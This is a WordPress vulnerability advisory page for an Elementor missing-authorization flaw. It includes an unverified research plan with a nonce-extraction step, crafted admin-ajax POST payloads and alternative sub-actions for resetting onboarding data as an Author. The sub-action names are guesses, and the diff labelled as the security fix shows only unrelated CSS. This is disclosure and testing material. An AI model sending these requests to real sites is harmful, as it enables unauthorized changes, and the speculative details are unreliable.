WP-Safety
CVE-2026-32445

Elementor Website Builder <= 3.35.5 - Missing Authorization

mediumMissing Authorization
4.3
CVSS Score
4.3
CVSS Score
medium
Severity
3.35.6
Patched in
40d
Time to patch

Description

The Elementor Website Builder plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 3.35.5. This makes it possible for authenticated attackers, with author-level access and above, to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=3.35.5
PublishedMarch 7, 2026
Last updatedApril 15, 2026
Affected pluginelementor

What Changed in the Fix

Changes introduced in v3.35.6

Loading patch diff...

Source Code

WordPress.org SVN
Vulnerable v3.35.5
Browse source Download .zip
Patched v3.35.6
Browse source Download .zip
Research Plan
Unverified

# Elementor Website Builder <= 3.35.5 - Missing Authorization (CVE-2026-32445) Research Plan ## 1. Vulnerability Summary The **Elementor Website Builder** plugin (versions up to 3.35.5) contains a missing authorization vulnerability in its **Onboarding** module. Specifically, an AJAX handler regist…

Show full research plan

Elementor Website Builder <= 3.35.5 - Missing Authorization (CVE-2026-32445) Research Plan

1. Vulnerability Summary

The Elementor Website Builder plugin (versions up to 3.35.5) contains a missing authorization vulnerability in its Onboarding module. Specifically, an AJAX handler registered under the elementor_ajax action fails to perform a sufficient capability check (e.g., manage_options). This allows authenticated users with Author-level access (capability edit_posts) to execute privileged actions related to site onboarding and experiments, such as resetting the onboarding wizard or clearing configuration data.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: elementor_ajax
  • Sub-Action: onboarding_reset_onboarding (inferred from JS clearAllOnboardingData) or onboarding_update_step.
  • Method: POST
  • Parameters:
    • action: elementor_ajax
    • actions: A JSON-encoded string containing the sub-action and its data.
    • _nonce: A valid AJAX nonce obtained from the page context.
  • Authentication: Authenticated (Author role or higher).
  • Preconditions: Elementor must be active, and the onboarding process should have been initiated or completed (to see the effect of the reset).

3. Code Flow

  1. Entry Point: The request hits admin-ajax.php with action=elementor_ajax.
  2. AJAX Manager: WordPress dispatches to Elementor\Core\Common\Modules\Ajax\Module::handle_ajax().
  3. Global Check: The handle_ajax function typically checks if the user has the edit_posts capability (default for Authors).
  4. Sub-action Dispatch: The manager iterates through the actions JSON array. For an action like onboarding_reset_onboarding, it looks for the handler in the Onboarding module.
  5. Vulnerable Sink: The handler function in Elementor\App\Modules\Onboarding\Module (likely named ajax_onboarding_reset_onboarding or similar) executes logic to delete options (e.g., delete_option( 'elementor_onboarding_data' )) without verifying that the user has manage_options permissions.

4. Nonce Acquisition Strategy

The elementor_ajax endpoint requires a nonce. In Elementor, this nonce is localized for authenticated users and accessible via the elementorCommonConfig JavaScript object.

  1. Access Point: Log in as an Author and navigate to the WordPress Dashboard (/wp-admin/) or the Elementor Editor for a post.
  2. Extraction: Use browser_eval to extract the nonce from the global JS configuration.
  3. JS Variable: window.elementorCommonConfig?.ajax?.nonce or window.elementorAdminConfig?.ajax?.nonce.

5. Exploitation Strategy

Step 1: Authentication

Authenticate as a user with the Author role.

Step 2: Nonce Extraction

Navigate to /wp-admin/ and execute:

browser_eval("window.elementorCommonConfig?.ajax?.nonce || window.elementorAdminConfig?.ajax?.nonce")

Step 3: Send Malicious AJAX Request

Send a POST request to admin-ajax.php to reset the onboarding data.

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=elementor_ajax&_nonce=[EXTRACTED_NONCE]&actions={"onboarding_reset_onboarding":{"action":"onboarding_reset_onboarding","data":{}}}
    (Note: The sub-action name onboarding_reset_onboarding is grounded in the JS call clearAllOnboardingData found in the bundle.)

6. Test Data Setup

  1. Plugin Installation: Install and activate Elementor 3.35.5.
  2. Complete Onboarding: As an Admin, complete the Elementor onboarding wizard or manually set the option:
    wp option update elementor_onboarding_data '{"completed":true,"step":"done"}'
  3. Create Author: Create a user with the Author role.
    wp user create attacker attacker@example.com --role=author --user_pass=password

7. Expected Results

  • HTTP Response: Status 200 OK.
  • JSON Response: {"success":true,"data":{"responses":{"onboarding_reset_onboarding":{"success":true,"data":[]}}}}
  • Database Effect: The elementor_onboarding_data option will be deleted or its completed status will be set to false.

8. Verification Steps

After the exploit, use WP-CLI to check if the onboarding state was reset:

wp option get elementor_onboarding_data

If the exploit worked, this command should either return an error (option not found) or show that the "completed" status is missing/false.

9. Alternative Approaches

If onboarding_reset_onboarding is not the correct action name, try the following sub-actions often found in Elementor's Onboarding/Experiments modules:

  • onboarding_set_step with data={"step": "1"}
  • onboarding_init_maybe
  • onboarding_complete_step
  • elementor_reset_experiments (related to clearExperimentData in the JS bundle)

Example Alternative Payload:

actions={"onboarding_set_step":{"action":"onboarding_set_step","data":{"step":"1"}}}

Reference the JS localization keys from assets/js/357684d6580904fc0a95.bundle.min.js:

  • STEP4_SITE_STARTER_CHOICE
  • EDITOR_LOAD_TRACKED
  • POST_ONBOARDING_CLICK_COUNT
Research Findings
Static analysis — not yet PoC-verified

Summary

The Elementor Website Builder plugin for WordPress fails to perform a sufficient capability check within its Onboarding module in versions up to 3.35.5. This allows authenticated attackers with Author-level permissions or higher to execute administrative actions, such as resetting site onboarding data or clearing configuration experiments, via the elementor_ajax endpoint.

Security Fix

diff -ru /home/deploy/wp-safety.org/data/plugin-versions/elementor/3.35.5/assets/css/admin.css /home/deploy/wp-safety.org/data/plugin-versions/elementor/3.35.6/assets/css/admin.css
--- /home/deploy/wp-safety.org/data/plugin-versions/elementor/3.35.5/assets/css/admin.css	2026-02-17 14:41:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/elementor/3.35.6/assets/css/admin.css	2026-03-03 14:49:18.000000000 +0000
@@ -2271,6 +2271,46 @@
   font-weight: 500;
 }
 
+#e-dashboard-ally .ui-sortable-handle {
+  justify-content: flex-start;
+  gap: 8px;
+}
+
+#dashboard-widgets .e-dashboard-ally {
+  padding: 28px 0;
+}
+#dashboard-widgets .e-dashboard-ally .e-dashboard-ally-img {
+  text-align: center;
+  margin-block-end: 16px;
+}
+#dashboard-widgets .e-dashboard-ally .e-dashboard-ally-info {
+  display: flex;
+  flex-direction: column;
+  align-items: center;
+  text-align: center;
+  margin-block-end: 20px;
+}
+#dashboard-widgets .e-dashboard-ally .e-dashboard-ally-title {
+  font-size: 20px;
+  line-height: 32px;
+  color: #0C0D0E;
+  margin-block-end: 0;
+}
+#dashboard-widgets .e-dashboard-ally .e-dashboard-ally-description {
+  max-width: 295px;
+  font-size: 14px;
+  line-height: 20px;
+  color: #3F444B;
+  margin: 0 0 16px;
+}
+
+label[for=e-dashboard-ally-hide] svg {
+  display: inline-block;
+  vertical-align: middle;
+  margin-inline-end: 4px;
+  margin-block-end: 2px;
+}
+
 .post-type-elementor_library #elementor-template-library-tabs-wrapper {
   padding-block-start: 2em;
   margin-block-end: 2em; ... (truncated)

Exploit Outline

The exploit leverages the `elementor_ajax` endpoint, which handles multiple actions in a single request and is typically accessible to users with the `edit_posts` capability (Authors). 1. **Authentication**: The attacker authenticates with an Author-level account. 2. **Nonce Retrieval**: The attacker extracts the AJAX security nonce from the global JavaScript configuration object `elementorCommonConfig` (specifically `elementorCommonConfig.ajax.nonce`) found in the WordPress admin dashboard. 3. **Request Crafting**: The attacker sends a POST request to `/wp-admin/admin-ajax.php` with the following parameters: - `action`: `elementor_ajax` - `_nonce`: The retrieved security nonce. - `actions`: A JSON object containing privileged sub-actions from the Onboarding module, such as `{"onboarding_reset_onboarding":{"action":"onboarding_reset_onboarding","data":{}}}`. 4. **Execution**: Because the backend handler for `onboarding_reset_onboarding` lacks a `manage_options` capability check, it processes the request and deletes or modifies the targeted configuration options.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/98bbec12-25f5-429c-a926-e8da34945962?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database